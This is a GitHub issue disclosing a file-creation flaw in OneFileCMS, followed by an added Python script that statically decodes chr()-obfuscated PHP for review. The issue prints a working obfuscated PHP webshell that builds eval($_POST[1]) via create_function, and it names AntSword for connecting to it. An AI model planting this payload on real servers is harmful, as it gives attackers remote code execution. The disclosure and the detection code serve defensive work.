OneFileCMS

Dangerous PHP files can be created, resulting in information leakage and RCE

Open WindyAlexQ opened this issue 1 year ago • 0 comments

  1. Enter the page using the default username and password.

  2. Click "New File" to create a new file named test.php.

  3. The content of test.php is <?php phpinfo(); ?>

  4. Access test.php directly.

  5. Follow the steps above to create the file test2.php with the following contents (for confused webshell) <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

  6. Connect using AntSword.

  7. You can get the webshell.

WindyAlexQ Apr 18 '24 02:04
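When reviewing files created through the editor, the chr() aliasing used in test2.php above can be resolved statically, without executing the file. This is an added example, not part of the original issue or of OneFileCMS; the function names, the keyword list and the sample input are assumptions constructed for illustration.

```python
import re

# Assumed review list: function names that warrant a closer look when they
# turn up inside a decoded string.
SUSPICIOUS = ("eval", "assert", "create_function", "system", "passthru", "shell_exec")

ASSIGN = re.compile(r"(\$\w+)\s*=\s*([^;]+);")             # $var = <expr>;
CALL = re.compile(r"(\$?\w+)\s*\(\s*(\d{1,3})\s*\)")        # f(99) or $f(99)

def decode_chr_chains(php_source):
    """Resolve `$v = f(N).f(N)...;` where f is chr or a variable that an
    earlier assignment resolved to the string "chr". Nothing is executed."""
    resolved = {}
    for var, expr in ASSIGN.findall(php_source):
        chars = []
        for part in (p.strip() for p in expr.split(".")):
            m = CALL.fullmatch(part)
            if not m:
                break                        # not a pure chr() chain
            func, code = m.group(1), int(m.group(2))
            name = resolved.get(func, "") if func.startswith("$") else func
            if name.lower() != "chr" or code > 255:
                break
            chars.append(chr(code))
        else:
            resolved[var] = "".join(chars)   # every part decoded
    return resolved

def suspicious_strings(php_source):
    """Decoded strings that name a function from SUSPICIOUS."""
    return {v: s for v, s in decode_chr_chains(php_source).items()
            if any(k in s.lower() for k in SUSPICIOUS)}

# Constructed sample: same aliasing technique as test2.php, but it only
# builds strings and never calls them.
SAMPLE = ('<?php $a=chr(99).chr(104).chr(114);'
          '$b=$a(101).$a(118).$a(97).$a(108);$c=$a(104).$a(105); ?>')

if __name__ == "__main__":
    for var, text in decode_chr_chains(SAMPLE).items():
        flag = "REVIEW" if var in suspicious_strings(SAMPLE) else "ok"
        print(f"{flag:6} {var} = {text!r}")
```

A variable that resolves to the string "chr" is itself worth flagging, since legitimate code has little reason to alias that function.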